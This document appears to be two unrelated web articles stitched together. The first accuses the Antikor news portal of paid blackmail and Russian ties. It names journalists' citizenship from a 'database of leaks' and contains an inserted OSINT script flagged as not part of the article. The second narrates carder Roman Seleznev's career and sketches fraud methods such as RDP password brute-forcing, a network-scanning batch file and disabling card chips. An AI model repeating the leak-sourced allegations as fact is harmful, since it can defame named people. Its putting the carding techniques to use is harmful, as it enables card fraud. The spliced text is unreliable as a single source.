Blackmailers from the “pro-Ukrainian” Antikor and Russian propaganda. What do they have in common?

The portal antikor.com.ua is known for its high-profile investigations into corruption in Ukraine. And even the laziest PR man knows the price list for paid-for publications in this “almshouse”, which since 2013 has been persistently slinging mud at Ukrainian bankers, oligarchs and politicians. From the start, the venal hacks geared their resources toward blackmailing people with publications and planting pro-Russian information. Most often the materials contained no evidence at all and consisted of stock manipulative phrases and exposés. But the music did not play for long, and the “ardent fighters against corruption” themselves ended up at the center of a scandal.

With the start of the war in Donbas, Kremlin propaganda about “Ukrainian punitive squads” and other similar nonsense, whatever the propaganda hacks could think up, periodically appeared on Antikor. Who sponsored all this, given that nothing appears on Antikor for free? One can puzzle over guesses for a long time and construct links between the Antikor people and Kremlin propaganda, but why guess when there are facts.

An entry from the Antikor site, found via archive.org

In 2018 it became known that the servers of Antikor.com.ua are located in Russia. You will agree, not the first choice of location for the server of a Ukrainian media outlet. And the page code of antikor.com.ua itself still has plenty of .ru suffixes to this day.

Code loading Russian analytics in the structure of the antikor.com.ua site
Another confirmation of the link with Russia: the yadro.ru counter code

As of December 2021, Antikor had moved to a dedicated IP, 185.203.72.75, at the Russian hosting provider Variti, which specializes in protecting sites against DDoS attacks.

Hosting providers located in Russia are marked in red.

It should be noted that Antikor was also hosted on another notorious service, provided by the FSB-controlled Russian company DDoS-Guard. DDoS-Guard also does not shy away from hosting drug-related and radical resources, and anti-Ukrainian and anti-American sites. DDoS Guard provides hosting to the government of Chechnya, the Russian Ministry of Defense and many other Russian resources. The hosting itself is strictly controlled by the FSB. In response to our demand to stop hosting resources that sell drugs in Ukraine, we received the reply that DDoS Guard employees are not specialists in psychoactive substances and cannot judge what exactly is being sold on a site.

The same hosting provider hosted a site with the following content

But that was a digression; let us get back to the matter at hand. According to Website Reports (http://websitesrate.com/website-report-search/adsense-pub-id/4336163389795756), sites such as Novostiua.org, Glavk.info, Kompromat1.info and Oplatru24.ru operate alongside Antikor under a single Google Ads Publisher ID (4336163389795756). Kompromat1, however, uses a separate dedicated IP, 185.169.155.17, which is on the servers of the Russian hosting provider Servicepipe. Previously all of the sites mentioned were on the servers of the Russian hosting provider Variti, in the subnet 185.203.72.0/24.
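The pivot described above (one AdSense publisher ID shared across sites, plus a check against the hosting subnet), as an added example that is not part of the original article. The HTML snippets and the `unrelated.example` record are constructed; the publisher ID, the two IP addresses and the subnet are the ones quoted in the text.

```python
"""Infrastructure pivot: group sites by AdSense publisher ID and hosting subnet."""
import ipaddress
import re
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlparse

# AdSense publisher IDs appear in page source as "ca-pub-" followed by 16 digits.
PUB_ID_RE = re.compile(r"ca-pub-(\d{16})(?!\d)")

# Subnet the article gives as the sites' former hosting range.
FORMER_SUBNET = "185.203.72.0/24"

# Constructed observations: domain, resolved IP and a fragment of page source.
# IPs and the shared publisher ID come from the article; the HTML is made up.
OBSERVATIONS = [
    {"domain": "antikor.com.ua", "ip": "185.203.72.75",
     "html": '<script async src="https://pagead2.googlesyndication.com/pagead/js/'
             'adsbygoogle.js?client=ca-pub-4336163389795756"></script>'
             '<img src="//counter.yadro.ru/hit?r=x" alt="">'},
    {"domain": "kompromat1.info", "ip": "185.169.155.17",
     "html": '<ins class="adsbygoogle" data-ad-client="ca-pub-4336163389795756"></ins>'},
    {"domain": "unrelated.example", "ip": "192.0.2.10",
     "html": '<script>google_ad_client = "ca-pub-1111111111111111";</script>'},
]


class _PageFingerprint(HTMLParser):
    """Collects publisher IDs and the hosts a page loads resources from."""

    def __init__(self):
        super().__init__()
        self.pub_ids = set()
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            # IDs can sit in any attribute (src query string, data-ad-client, ...).
            self.pub_ids.update(PUB_ID_RE.findall(value))
            if name == "src":
                host = urlparse(value).hostname  # also handles //host/path URLs
                if host:
                    self.hosts.add(host)

    def handle_data(self, data):
        # Inline <script> bodies arrive here; older tags set google_ad_client.
        self.pub_ids.update(PUB_ID_RE.findall(data))


def fingerprint(html):
    """Return (publisher IDs, resource hosts) found in a page's source."""
    parser = _PageFingerprint()
    parser.feed(html)
    parser.close()
    return parser.pub_ids, parser.hosts


def cluster_by_publisher(observations, min_sites=2):
    """Map each publisher ID to the sorted domains using it (shared IDs only)."""
    clusters = defaultdict(set)
    for obs in observations:
        pub_ids, _ = fingerprint(obs["html"])
        for pub_id in pub_ids:
            clusters[pub_id].add(obs["domain"])
    return {pid: sorted(doms) for pid, doms in clusters.items()
            if len(doms) >= min_sites}


def in_subnet(ip, cidr):
    """True if the address falls inside the given CIDR range."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(cidr)


def summarize(observations, cidr):
    """One row per site: publisher IDs, subnet membership, .ru resource hosts."""
    rows = []
    for obs in observations:
        pub_ids, hosts = fingerprint(obs["html"])
        rows.append({
            "domain": obs["domain"],
            "pub_ids": sorted(pub_ids),
            "in_subnet": in_subnet(obs["ip"], cidr),
            "ru_hosts": sorted(h for h in hosts if h.endswith(".ru")),
        })
    return rows


if __name__ == "__main__":
    for pub_id, domains in cluster_by_publisher(OBSERVATIONS).items():
        print(f"shared publisher ID {pub_id}: {', '.join(domains)}")
    for row in summarize(OBSERVATIONS, FORMER_SUBNET):
        print(row)
```

A shared publisher ID indicates a common advertising account, not necessarily a common owner, so it is one signal to weigh alongside hosting history and page-level similarities.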

If you go through these resources, even a blind man will notice the similarities between Antikor, Glavk and Kompromat. The sites share one color scheme, the same fonts, the same sequence of presenting material and even some of the same menu functions. But the main thing is a single subject shared by all three. All three resources are ardent fighters against corruption. Only Glavk and Kompromat are Russian media, while Antikor is supposedly ours, Ukrainian. In this light the whole situation looks even more suspicious, given that the owners of the Antikor portal hold Russian citizenship and have possible links to the FSB.

To know the heroes by sight, it is worth going through the names listed on Antikor itself in the “About us” section.

Information about the journalists and editors of the Antikor portal is rather limited. However, we managed to find the following:

Ruslan Yakushev previously worked at a number of media outlets, including TabloID and Obkom.

Oleg Boyko took part in creating a number of projects, including Nezavisimaya Gazeta and Grani.ru.

Mikhail Sokolov worked at a number of media outlets, including Rossiyskaya Gazeta, RIA Novosti and Zvezda.

According to records in our database of leaks, all three hold Russian citizenship.

Aleksei Golobudsky, in his article “Tools for spreading Russian propaganda: alive and here to stay?”, writes about Konstantin Chernenko, who was listed at Antikor as editor-in-chief: “Chernenko has been known in professional circles for more than 10 years as someone who works directly with Russian clients. And while before the war there was nothing especially criminal in this (merely unpleasant, perhaps), with the start of the war the assessments changed radically.”

Chernenko also holds Russian citizenship.

The mention of the Antikor portal in Artem Zakharchenko’s article on Russian information trails indicates that this portal is known not only in Ukraine but also beyond its borders. In his article Zakharchenko says that Antikor rarely stays on the sidelines of any scandal or planted story, which may indicate the portal’s unwillingness to act objectively and independently.

At the same time, Antikor’s involvement in various scandals, and in accusations of spreading disinformation and propaganda of a position favorable to Russia, raises serious questions about the quality of its journalism and the ethics and legitimacy of the portal’s activity. Moreover, this may be grounds for further investigations and for possibly holding the owners of Antikor accountable for their activity.

The price list for Antikor’s services is also well known. To have an “unwanted” article removed from the site, the price ranges from $1000 to $50000. And in 2019, when we were just beginning our investigation of Antikor’s activity, more than $1 million in bitcoin, at the exchange rate of the time, passed through the BTC address that was given for receiving payment for the removal of an unwanted article.

Should such a resource exist, and its authors continue their anti-Ukrainian activity?

Run, Roman, Run

If you think that the richest people are the happiest ones and can buy everything, this story is just for you. Freedom, health and happiness cannot always be bought with money, nor can devoted friends or the lives of loved ones. We often forget about simple but very important things in the chase for money. Buddhists say that we die every second and our life consists of millions of choices. But it is your life and your choice, live it.

This story is about one very lucky, but very unhappy person, who made many wrong choices that dramatically affected his fate.

Marrakesh

Early in the morning of April 28, 2011, Jemaa el-Fnaa square in the center of Marrakesh was teeming with people. In this traditional eastern chaos, local passers-by and tourists scurried between cars, stalls, luxury hotels and street eateries. Among them was Roman Seleznev, a plump guy with a large mole on his cheek, his face unshaven and slightly swollen after yesterday’s adventures. A strong smell of alcohol and the lack of a jacket also hinted at a fun night. Because of this, Roman and his wife were refused breakfast in the restaurant of the luxury hotel where they were staying. So they had to look for another place to eat, and quickly: Roman was in the middle of a fight with a strong hangover, the hangover was winning, and he needed reinforcement in the form of a shot of whiskey. They went out to the square and rushed to the nearest decent eatery, located directly opposite the hotel. They had no strength to go further: the ‘tanks’ were burning, and Roman wanted a drink much more than eggs Benedict for breakfast. But when they got in, for some reason they were not welcome here either: the waiter replied that he would serve them no earlier than in half an hour. Roman once again blamed himself for the tracksuit he wore and yesterday’s fumes, and said stubbornly: ‘We’re stay’. To which the Moroccan waiter puzzlingly replied: ‘Bad idea’.

Ten minutes later a sudden strong blast shattered the place… It was a terrorist attack. A rolling roar was followed by total silence, then chaos and panic. Fire, dust, stones, fragments of bodies and blood.

Shocked, Roman came to his senses for a short time. As it turned out, terrorists had left two briefcases with explosives in this cafe and blown them up using a mobile phone. 17 people died. Moroccan authorities blamed al-Qaeda for the attack, but the organization never claimed responsibility for it.

Roman’s wife was almost unharmed, but Seleznev fell into a coma, even though his father, a State Duma deputy from the Liberal Democratic Party of Russia, evacuated his son on a special medevac jet. Roman’s father did not rely on medicine alone; the caring parent called a priest, who baptized Roman while he was unconscious, probably in hopes of a quick Christian funeral, as even then the father owed Roman a huge sum of money and expected to grab more out of Roman’s bank vault. Despite all these efforts, the doctors’ predictions were disappointing. According to them, Seleznev could die at any moment or remain in a ‘vegetable’ state until the end of his days. After these events, Roman’s wife packed up all her belongings and flew to Vladivostok. There she took money, applied for a US visa, which was approved, and thereafter emigrated to the United States for permanent residence. While Roman was in a coma, he received a letter from King Mohammed VI of Morocco: ‘The people of Morocco were deeply shocked and saddened to learn that you have suffered’, the letter said.

But Roman was a die-hard: despite all the bad predictions, Seleznev’s inner persistence prevailed with the Lord’s help. Roman came out of the coma after two weeks. Recovery took him about a year; after numerous surgeries, a titanium plate replaced part of his skull.

But this incident is not the most surprising twist in his biography; it is rather a coincidence, or one of those choices that we make every day, every second. Maybe, sometimes you need to look more closely at the signs? Especially when they say to you: ‘Bad idea’ …

nCux (Psycho) from Vladivostok

Seleznev was born in the city of Vladivostok on July 23, 1984. His parents divorced soon after. Little Roman stayed with his mother in a communal apartment of 100 square feet. Later, she bought an apartment from her brother, and the small family of two moved there. His mother worked as a cashier in one of the district grocery stores and drank often. Roman spent most of his childhood either alone or in the care of his grandmother. In the harsh life of Vladivostok in the 2000s, his friends called him nCux (a transliteration of the Russian word ‘Psikh’, meaning ‘Psycho’; hereinafter referred to as ‘Psycho’ – added by N.) for his stubborn and explosive personality. He tried everything from sniffing glue to alcohol and drugs.

One day in 2000, when Roman returned home, he discovered that his mother had drowned in the bath. On the same day, her brother came to the apartment, took away all the valuables and ordered the sixteen-year-old Seleznev to vacate the living space. The teenager went to live with his grandmother and got a job in a computer club, where he received 200 rubles (about $5 back then) per day. Later, Roman wrote in his letter to the US government that his grandmother was his only true parent and loved one.

Just imagine that this very guy will steal his first million in a few years.

Roman had to make a great effort for this to happen, and his persistence prevailed despite all the hardships. He soon finished high school, made progress in mathematics and computer science, and was even able to learn rudimentary English. Probably because of the desire to survive, Psycho’s childhood idols were the Teenage Mutant Ninja Turtles. Pizza at that time was also a luxurious delicacy for a simple guy from Vladivostok.

The computer club where Seleznev worked had an internet connection, as did his home PC. To buy it, he saved money by eating low-quality food for months. He also bought a modem and had a connection to FidoNet. Roman was interested not only in browsing and gaming, but also in ways to make money somehow. And he found them on the carderplanet and carder.org forums. He quickly found his own kind there and rewrote his street name in a hacker way. Over time, the long nCux in maHke (a transliterated version of ‘Psycho in tank’ – added by N.) turned into the short nCux (Psycho).

Roman met his first accomplice, with the awkward nickname Eadle, on the forums. Eadle, either ‘eagle’ or ‘delayed’ (which can be understood as “retarded” in Russian), was one of the first to mass-scan RDP servers for simple or standard passwords, or their total absence. It should be noted that both Windows 2000 and Windows Server left the administrator account password blank by default and required additional steps to change it. All Eadle had to do was write a scanner that worked over the RDP protocol. At that time not many people had figured out the trick, so the catch was so immense that it was impossible to process everything manually. In most cases a keylogger was installed on the infected machines.

One day, Eadle found on one of the infected computers an account for the American system Accurint, which belonged to the LexisNexis corporation. The system was intended for personnel of US Internal Affairs entities, lawyers, law enforcement and licensed private investigators. It provided access to personal information of US citizens. Psycho quickly realized that such information could be ‘useful’ not only for the police, but also for the carders. Stolen credit cards enriched with such information were far more expensive on the black market. Such a “package” could contain almost everything that could be found about a person: Social Security number, utility and bank bills and even, after some additional research (using an ancestry research website, ridiculously also paid for with stolen credit cards), the mother’s maiden name. This way it was possible to get access to the victim’s bank account and understand exactly what kind of budget a victim had, or even transfer funds. Soon, Psycho negotiated a deal with Eadle, made a deposit to the forum fund and became an “official” seller on carderplanet.

In addition to various records, there were also credit cards, which were enriched with data from Accurint and sold as ‘fulki’ (‘full info’ in English). Time passed and Seleznev earned a reputation as a reliable seller, so he began to earn decent money. Now he was able to rent a cozy apartment near the center of Vladivostok and even bought an old ‘right-handed’ Toyota Mark II. But he wanted more… And BadB was already appearing on the horizon.

By the time they met online, Vladislav Horohorin had already been expelled from carderplanet and had proved himself to be a cad who did not always keep his word. But thanks to non-trivial solutions for finding credit cards in hacked card processing companies, and strong connections with other hackers, he was the top dog in the stolen card business. BadB was the most famous seller of stolen data after Script, and Roman decided to turn to him. The questions were how to automate the process of searching for credit cards and, most importantly, how to find ‘dumps’: information from a credit card’s magnetic stripe.

Horohorin wrote a simple program that searched for information not only on the local computer, but also went through neighboring network resources and searched for credit cards and ‘dumps’. The result was not long in coming: there were no more than 10,000 numbers in the ‘leaked’ dump database, but all of them belonged to clients of a luxurious Swiss hotel. Even the most ordinary cards from this database easily allowed purchases of several thousand dollars. The average price of a ‘dump’ was $50 at that time. The math was simple: 10,000 x $50 = $500,000 – maybe a little bit less. Psycho received only $60,000 for the first part of the database from BadB. Later, Roman delved into the question and understood how greedy Horohorin was. So he offered to split the profit evenly. The dumps from this database had the effect of a nuclear explosion on the market: everything worked for thousands of dollars without fail – ‘America’ in ‘Europe’, ‘Europe’ in ‘America’. Some cards ‘passed’ tens of thousands of euros and beat all the records. Moreover, BadB invented a way to use chip cards, which were beginning to appear in Europe, even in terminals that required a chip. The smart card was burned with high voltage, and the terminals then allowed the magnetic stripe to be used.

But Roman did not work alone; there was also Eadle, with whom he had to share, and Seleznev did so honestly. His demands had also grown: the 2-room apartment on Vtoraya Rechka (translated as ‘Second River’ – a district in Vladivostok city – added by N.) was quite small and the old Japanese car was too slow.

And there were friends. Those friends who had supported Roman in the most difficult moments of his life. They were like the brotherhood of the Ninja Turtles: they had fought for him in school; they were the same friends with whom he had spent all his childhood. At this very moment they had not managed to get into university and were trying to find at least some job. Yes, the very ones that Roman had completely forgotten about. And now he had to remember them.

Bigbucks

Psycho decided: ‘Fuck this fat lying cunt’. And he stopped working with BadB. Roman had no interest in deals with Horohorin, because now he had his own “clique” to care about.

Seleznev launched his own service with 24/7 support. The guys rented an apartment in the center and were on duty in ICQ messenger in shifts. Nobody provided such a level of service at that time.

Many people had to deal with BadB only because there was no alternative. But with the appearance of polite and good-natured ‘online ninjas’, many carders immediately turned to them. Moreover, the service worked 24/7.

Once, the doorbell of the rented apartment rang: ‘Open the door – it’s a plumber – you are drowning the neighbors’. The one who was ‘on shift’ opened the door, but immediately regretted it on receiving a strong blow to the face. Three men in masks burst into the apartment with rifles and shouted: ‘Lie, the fuck, down, face to the floor! I’ll kick all the shit outta you!’ The robbers not only took all the cash while holding the hostages, but also sent one of Seleznev’s employees to bring the money that was stashed at the carders’ house. They knew very well that there would be no police; after all, Seleznev’s business was illegal and the police corrupt. Calling the police might have caused even more problems than dealing with the gangsters.

As it turned out later, friends of Roman’s ex-girlfriend were behind the robbery; in this way she decided to receive compensation for their break-up. After the robbery, the guys moved to the Hyundai Hotel, under the reliable surveillance of video cameras. They rented a luxurious office in the center of the city.

They no longer worked with BadB, but continued to communicate with him in order to get some specific information or just to eliminate the competition; the guys often drank and partied with Horohorin in three shifts. So, while BadB was in an alcoholic coma, his service was down, while one of Seleznev’s guys was always online. It also came to quite eccentric episodes: rock-star-style total destruction of presidential suites where George Bush once stayed, gang-bang parties with top Moscow prostitutes, and drunken losses of $60,000 in casinos and Forex club. In the end, BadB, being a loner, counted on friendship, and Seleznev just made money with his company. C’est la vie.

Models of everything (including software for sorting stolen card databases) were copied from Horohorin. The guys turned into reality the drunken proposals of BadB, which he might not remember in the morning. So, during one such carder feast, BadB suggested developing complex software that would be loaded through vulnerabilities in the browser, would find cards in attacked networks and could infect adjacent computers on the network. But Seleznev did not want to carry out difficult schemes; a regular .bat file was written. In the best Soviet traditions, it was as simple as a sickle and as effective as a hammer. By means of the net map command it identified computers on the network and searched their contents with standard Windows tools; all this was turned into an executable file using the bat2exe utility. The most amazing thing is that even this solution worked. For every 10,000 ‘installs’, that is, infections, one card database was discovered.

Psycho quickly realized that the hottest targets were POS terminals. None of his team had the slightest idea about programming, so coders were hired. Meanwhile, the ideas were boldly borrowed from BadB. Eadle also continued to work, bruteforcing simple passwords for VNC and RDP on payment terminals. More sophisticated software was developed later; it searched not only for plain text, but could also intercept traffic or the information exchange between the reader and the host. Seleznev bought ‘installs’, infected systems and copied all card transactions automatically through vulnerabilities in the browser. The scheme worked. By 2009, Seleznev had become one of the most successful sellers of stolen cards in the world. Roman was a respected person even on closed carder forums, despite the fact that he had neither hacking nor programming skills. In most cases, his targets were small eateries in Washington DC and other US cities. The materials of the criminal case mention several pizzerias, burrito street-food stands and bakeries (about 3,700 enterprises in all over the years). Seleznev chose small businesses because of poor security: such enterprises do not have their own cyber defense departments and usually use bad passwords.

At that time, the discussion of ‘unlimited’ cashouts had just begun in private forums. The essence of the attack was to hack the processing of a card-issuing institution. Limits were removed on these cards; the cards themselves were transferred to ‘drops’, who went to ATMs and withdrew money until the payment system operators noticed something was wrong and turned off the processing entirely. Methods of attacking HSMs in order to extract PIN codes were also discussed and developed.

‘Unlimited cashouts’ occurred frequently. The guys’ faces became familiar near the ATMs in Vladivostok very quickly, and they had to travel to other cities to cash out: to Moscow or even to Khabarovsk. At one point, during a cash-out, the drunken gang of Seleznev and his accomplices went right into a closed bank office, pissed all over the place and defecated into a waste bin, despite the CCTV surveillance. The bank took it as a personal insult and started to chase the gang all over Vladivostok.

Several successful methods of attacking HSMs had been developed in the carder community. Even if the attacks failed, you could always find the right person in the right country: the carders were everywhere. Neither Seleznev nor his team had the slightest idea how to carry out such attacks. But why would they? The hacks were made by such virtuosos as the Drinkman brothers, Scorpo and M1cron. Or Pleshchuk and Tsurikov, Gucci and Liqud, or Yakubets, the Aqua; they all were in touch with Seleznev. nCux and his team were content with the role of cashiers. They also distributed cash cards to trusted customers. Incomes skyrocketed and the guys had to buy a cash-counting machine, because counting cash manually took a lot of time, which they had already learned to use properly.

Cybernetics, automation, Bulba and rebranding

But BadB did not sit idle. The idea of creating an automatic shop for stolen credit cards had been in the minds of carders for a long time. But no one believed that such a store would ‘stand’ under the onslaught of special services and competing carders. Nevertheless, BadB turned the dream into reality. In early 2008, Horohorin presented the first fully automated shop for stolen credit cards. It looked almost like Amazon: you could search by category and choose between card brands or different financial institutions. The US authorities claim that Horohorin ‘reflashed’ the carding market: earlier, stolen cards appeared in separate branches of forums; now, the process of stolen data exchange had been optimized and automated.

In the first version of the store, accounts were topped up through Webmoney, Liberty Reserve and, semi-automatically, through the Western Union system. Horohorin approached the matter with all seriousness and used in the store such emerging technologies as browser fingerprinting and supercookies. The store itself was well protected by renting a whole segment of IP addresses in Panama, while the servers were physically located in Moscow. In addition, in the case of a DDoS attack, IPs were switched automatically, all this years before Cloudflare or Silk Road. Merchants uploaded cards and controlled sales in a fully automatic mode. Most carders appreciated the convenience and began to use the service actively. Some believe that in the following years automated drug markets borrowed some of those ideas.

The glory of BadB haunted Psycho, and although Horohorin offered to resume cooperation many times, Seleznev went his own way. Roman secretly deleted his former pseudonym and hired a programmer who developed an automatic store similar to the BadB service. BadB’s monopoly didn’t last long: in 2009 Seleznev opened a similar service under new nicknames, Track2 and Bulba. BadB reacted immediately and furiously, especially when Seleznev’s new platform completely bought out advertising on the main carding platform of that time, the carder.su forum.

Roman bribed the forum administration and took over all rights to advertise the sale of credit card dumps. Horohorin’s fury knew no bounds. A powerful DDoS attack immediately ensued and took the new track2 service down. Horohorin, who was familiar with Webmoney service operators, also managed to lock down the purses used to receive payments for stolen cards. Powerful DDoS attacks and death threats, promising all kinds of the most exotic executions, followed the service all the time.

BadB had no idea that his new competitor was one of the few people he considered his friend. The Ukrainian with Jewish roots was not very good at making friends, but did not lose hope of doing so. The total terror from BadB’s side ended only when Roman accidentally ended up with the same bulletproof hosting operator that hosted BadB’s own infrastructure. Every time he attacked Seleznev’s service, BadB was actually cutting the branch on which he himself sat. He also failed to bribe the hosting operator, who benefited from such competition. The ‘platform war’ continued until the arrest of BadB in August 2010, after which Seleznev actually remained a monopolist.

But he managed to reach Horohorin’s level much later: after the terrorist attack, Roman changed his nickname again, to 2pac, and the site was called 2pack.cc. He positioned his resource as a platform for the best sellers of stolen data in the world, promised round-the-clock customer support and daily updates of the range of bank cards. Seleznev not only sold goods from his own sources; he was approached by hackers from all over the world who had hacked Home Depot, Neiman Marcus and Target. In turn, Seleznev shared honestly and gave the best prices for their product.

Run, Roma, run!

This is how this chapter should begin… but sentiments aside. The United States Secret Service (USSS) had been monitoring the activities of Seleznev and his accomplices since 2002. On May 19, 2009, agents of the FBI and the US Secret Service met with representatives of the FSB in Moscow after the arrest in Estonia of Sergei Tsurikov, the first detainee among the participants in the RBS WorldPay hacking case. The subject of the conversation was residents of the Russian Federation who had participated in the hacking of RBS and the cashing out, but did not travel abroad. During the exchange of information, US intelligence agents provided evidence that behind the nickname nCux was a resident of Vladivostok, Roman Seleznev, who had cashed out about a million US dollars, himself and through his ‘drops’, during the attack on RBS and shared the income with the organizers of the attack.

A curious thing is that Evgenii Anikin and Viktor Pleshchuk, citizens of the Russian Federation who were directly involved in the RBS hack, ‘got off’ with suspended sentences in 2010-2011, although Anikin spent a year in a pre-trial detention center in the Russian Federation. Oleg Covelin, a resident of Moldova who initially gained access to the internal network of the financial institution and was also mentioned in the US RBS indictment, was detained in 2016 during an international operation against the Cobalt/Carbanak group.

In June 2009, a month after the meeting between the American intelligence services and the FSB, Psycho announced on one of the carder forums that he was leaving the business, after which his profiles on the forums were blocked. An interesting fact: the US criminal case indicates that it was the FSB who whispered to Seleznev that the American authorities were interested in him. As follows from the investigation records, the carder’s correspondence confirms his connection with the FSB. For example, Seleznev wrote about this to Horohorin and claimed that he had a ‘roof’ from the Russian special services. Most likely, there was no protection. But there was a father with serious connections, who had recently appeared in his son’s life.

There is a bad luck island in the ocean…

Seleznev earned quite well. Through one of the money transfer services he cashed out about $18 million. His exact earnings are unknown, but they are in the tens of millions of dollars: the carder received money through bitcoins, WebMoney and other electronic currencies. He regularly took money in bags from Moscow to Vladivostok, bought two houses in Bali, and flew by plane to islands in the Indian Ocean. He often photographed wads of money and expensive cars.

Realizing that he could be tracked by US intelligence agencies, Seleznev traveled carefully. He chose countries that did not have an extradition treaty with the United States and bought tickets only at the last moment, making it difficult for the special services to track his movements. In July 2014, he traveled to the Maldives, where he rented a villa for $1,400 per night. ‘I took the most expensive villa for myself, I have my own servants’, he wrote to one of his accomplices. After learning that Seleznev was in the Maldives, the US Security Service agents asked the US State Department to use its connections with local authorities. After negotiations, the head of the country’s police agreed to detain the hacker despite the absence of an extradition treaty. Then three US special agents flew to the Maldives; together with the police, they tracked Seleznev’s movements. Roman was detained on the way to the airport, from where he was supposed to fly to Moscow.

The carder was forced into a private jet and brought to the American military base in Guam within 12 hours. According to the criminal case, Seleznev had a laptop with the data of 1.7 million stolen credit card numbers, as well as passwords for access to servers, email accounts and financial transfers. The password for the laptop was simple: ‘Ochko123’ (meaning asshole123). There was no encryption at all.

In Guam, Seleznev appeared before a judge who confirmed the legality (in the legal field of the United States) of the arrest and of the further transportation of the carder to Seattle, where he was charged and sent to SeaTac federal prison, with bail refused. The indictment, which had been pending against Roman since March 2011, included 40 counts of computer fraud, hacking, wire fraud and identity theft. A long term of up to 38 years in prison was already on the horizon.

The arrest of nCux on American warrant was considered illegal in Moscow, and parliamentarian Valerii Seleznev claimed the arrest of his son was a kidnapping and turned to the Russian Foreign Ministry for help, where he was supported by a corresponding statement. ‘We regard what happened as another unfriendly step by Washington’, – the statement said. ‘This is not the first time that the American side ignores the 1999 bilateral Treaty on Mutual Legal Assistance in Criminal Matters and goes for the actual kidnap of a Russian citizen.’

How it was

The Americans had been tracking the nickname nCux (Psycho) since 2002, from the very time when Roman was just starting to sell ‘full info’ on carderplanet. In May 2010, USSS special agent David Dunn took part in an operation in Coeur d’Alene, Idaho, carried out at Schlotzsky’s Deli, a well-known fast food chain, over a leak of visitors’ credit card data. He inspected the computer equipment there and found that a Schlotzsky’s Deli computer was connected to a Russian IP address. David took note of this fact; a few weeks later many stolen credit cards surfaced on the network and were traced back to the point of the data breach, which turned out to be the computer of the Schlotzsky’s Deli restaurant.

A US citizen suspected of installing malware at the Schlotzsky’s chain was arrested in connection with the leak. Detective Dunn examined the suspect’s confiscated computer and found that he had been browsing two websites, Track2.name and Bulba.cc, and chatting with a man named Track2. Further verification showed that the carder nicknamed Track2 had his own online shop for stolen cards, which was advertised on the carder.su forum. However, it turned out that one store site, Track2.tv, was under DDoS attack, while another site – bulba.cc – was working.

The detective began to explore these sites to find out who was hiding behind the aforementioned nicknames. After examining the domain information, he determined the e-mail box from which the registration had been made. Later he found other mailboxes located in the US that were also associated with these accounts.

Eastern Virginia supported the investigation of this case with the CIS, and they began to collect warrants for information and evidence in October 2010. Detective Dunn knew that it would take some time.

And while he was waiting for a warrant, a second hack took place on October 21, 2010 – this time at one of the oldest Broadway Grill restaurants on Capitol Hill in Washington.

Dunn arrived in Washington and began to study the point-of-sale computers together with a local detective. They found that the servers, which stored the data of 32 thousand bank cards in the form of plain text files, were very poorly protected. Information from these computers was leaked to the same IP address that was used on the computers of the Schlotzsky’s Deli restaurant in Idaho.

Detective Dunn realized that he had the opportunity to investigate the crime at home, so he had no need to travel to Virginia or Idaho and could file a case here – in western Washington.

Then the case started to get ridiculous. American services found out who was behind the carding sites within the period from November 2010 to February 2011. Detective Dunn identified the Yahoo mailboxes that led to a HopOne server, from where the stolen card data was forwarded to a server in Russia.

Dunn found out who owned the HopOne server. He pentested the Yahoo server in order to monitor incoming and outgoing connections. He was unable to access the contents of the server at this stage, but he was able to establish the IP addresses of incoming and outgoing connections, the numbers of some ports and the amount of transferred data. He saw that this server was connected to hundreds of computers throughout the United States and that many of them were installed in cafes and restaurants.

The detective discovered many hacking tools on the HopOne server, which made it possible to reconstruct the scheme used by Seleznev and his team. They performed a port scan on the victims’ servers for open RDP connections. The hackers then tried to break into these servers by brute-forcing passwords. Stolen data was then uploaded to the attackers’ servers: one under the nicknames Shmak/Smaus with an IP address of 188.120.255.66, the HopOne server with an IP of 66.36.240.69, and a Ukrainian server with an IP of 188.95.159.20. From there, the data was sent to the websites of the carder sellers under the nicknames Track2 and Bulba, which belonged to Seleznev. But at this point the detective could only guess and look for evidence against the Russian hacker.

The Yahoo mailbox that was used to register the server for Shmak, Smaus, Track2 and Bulba was also connected to the HopOne server. In addition to the above, detectives found almost 400,000 credit card numbers on HopOne. Credit card data was sorted by the IP addresses from which it was transferred. This made it possible to identify all the victims and collect more evidence quickly.

Gradually, the hacking chain began to reveal itself, and the email addresses pointed to Seleznev. He used one of the Yahoo mail service addresses that received various notifications. In the mailbox [email protected], detectives found a letter about the successful registration of Roman Seleznev in the PayPal payment system on September 19, 2009. It was a real fiasco. The beginning of the end.

This fact was one of the strongest pieces of evidence against Roman – in addition to the information that BadB, who had been arrested earlier, had already become an informant. Seleznev did not even think that user registration data was carefully stored in full by US payment systems.

And it was not just a rule, but a requirement. The data that he provided included his registered address in Vladivostok, which later served to identify him during the arrest.

Another account that detectives discovered, [email protected], had been used by Roman many years earlier, in 2006. This e-mail box helped to establish Seleznev’s connection with his first nickname, nCux (Psycho). The Americans had gained access to the contents of the mailbox and even traced how Seleznev, aka nCux, courted his wife and ordered flowers for her. The detectives found a postcard with the words: ‘You are the most beautiful, but Eva is more beautiful than you!’

Eva is the name of his daughter, which was also entered in the passport and served as another proof of identification during the arrest. An online store order with delivery to his home address in Vladivostok was also in this e-mail box.

In the end, the most significant piece of evidence was found on HopOne’s server, where he and his accomplices kept their hacking tools. Seleznev had saved on this server the booking information for airline tickets for an Indonesia-Singapore flight; his personal data and the number of his Russian foreign-travel passport were also indicated in the booking form. The match between the data of this order and the data of the passport served as further evidence during his arrest. Such a ridiculous mistake was possible in only two cases: either he was not himself, or he wanted to go to jail. There is no third option. But what’s done is done.

The Secret Service put all this evidence together. But even after that, the agents continued to look for Seleznev’s involvement in other cybercrimes. All carders are somehow related to each other. And if you remember, the investigation began with the CarderPlanet carding community.

A certain Mr. Carranza, associated with the forum, was one of the detainees back in 2003. His computer contained correspondence with nCux111, who had provided his real data – first name, last name, home address in Vladivostok and two emails, among which was [email protected]. Carranza used this information for a plea bargain.

Detective Dunn and a representative of the prosecutor’s office had collected all this evidence and turned to the jury in 2011. They received an indictment that charged Roman Seleznev, known by 9 hacker nicknames, with committing computer crimes, fraud with bank cards and funds’ usage to hack traffic.

Michael Adams, another agent, sold “fake” US driver’s licenses during a special undercover operation. Those licenses were made in the very same office where the original ones were made. Of course, his service received the best reviews for quality and speed. As a compliment, Adams, acting as a forum seller, offered a free driver’s license to every prolific vendor on the market. nCux was one of them. Once again the name of Roman Seleznev was confirmed and a photo obtained. All in all, more than 100 felons were identified and captured during Adams’ operation.

Where Dreams May Come

